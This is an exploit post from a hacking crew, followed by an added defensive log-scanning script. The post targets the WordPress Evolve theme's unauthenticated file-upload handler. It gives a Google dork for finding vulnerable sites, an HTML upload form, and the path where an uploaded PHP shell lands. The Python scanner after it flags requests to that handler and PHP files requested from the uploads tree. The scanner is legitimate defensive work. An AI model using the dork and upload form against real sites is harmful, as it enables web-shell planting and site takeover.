Assalamuallaikum Wr.Wb
- #Author: People_hurt
- #Dork: inurl:"/wp-content/themes/evolve/js/"
- #Type: CSRF & Xampp, Uploadify
- #Tested:-
- #CMS: WordPress
- Indonesian Cyber Freedom | SlemanGetar
Vulnerability: /wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php
{"error":"No files were uploaded."}
CSRF:
<form enctype="multipart/form-data"
action="Co.il/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell Location:
/wp-content/uploads/2015/03/IcalSadega.php
Credits : PriaPolos - Extreme Crew
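
Added detection example (not part of the original post): a log scan that flags requests to the upload handler named above and any PHP file requested from the WordPress uploads tree, marking the case where the same client POSTed to the handler first. It assumes the common/combined access log format; the sample log lines, client addresses and the names `scan`, `HANDLER` and `SAMPLE_LOG` are constructed for illustration.

```python
import re

# Handler path taken from the advisory above.
HANDLER = "/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php"
# The uploads tree should hold media only, so any PHP file requested there is suspicious.
UPLOADED_PHP = re.compile(r"/wp-content/uploads/.*\.(php\d?|phtml)$", re.IGNORECASE)
# Assumed common/combined log format: ip - - [time] "METHOD target proto" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2015:10:00:01 +0000] "GET /wp-content/uploads/2015/03/photo.jpg HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2015:10:02:11 +0000] "GET ' + HANDLER + ' HTTP/1.1" 200 36',
    '203.0.113.9 - - [10/Mar/2015:10:02:40 +0000] "POST ' + HANDLER + ' HTTP/1.1" 200 18',
    '203.0.113.9 - - [10/Mar/2015:10:03:02 +0000] "GET /wp-content/uploads/2015/03/example.php?x=1 HTTP/1.1" 200 412',
    '198.51.100.7 - - [10/Mar/2015:10:05:00 +0000] "GET /wp-content/uploads/2014/11/old.php HTTP/1.1" 404 0',
]

def scan(lines):
    """Return findings as (ip, kind, path, status) tuples, in log order."""
    findings, posted = [], set()  # posted: client IPs that POSTed to the handler
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not parse
        ip, _ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        if path.endswith(HANDLER):  # endswith also covers WordPress in a subdirectory
            kind = "upload-handler-post" if method == "POST" else "upload-handler-probe"
            if method == "POST":
                posted.add(ip)
        elif UPLOADED_PHP.search(path):
            kind = "php-in-uploads-after-post" if ip in posted else "php-in-uploads"
        else:
            continue
        findings.append((ip, kind, path, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `php-in-uploads-after-post` finding with a 200 status is the one to triage first: check the uploads directory on disk for that file. Disabling PHP execution under the uploads directory in the web server configuration closes the second half of the chain regardless of the theme.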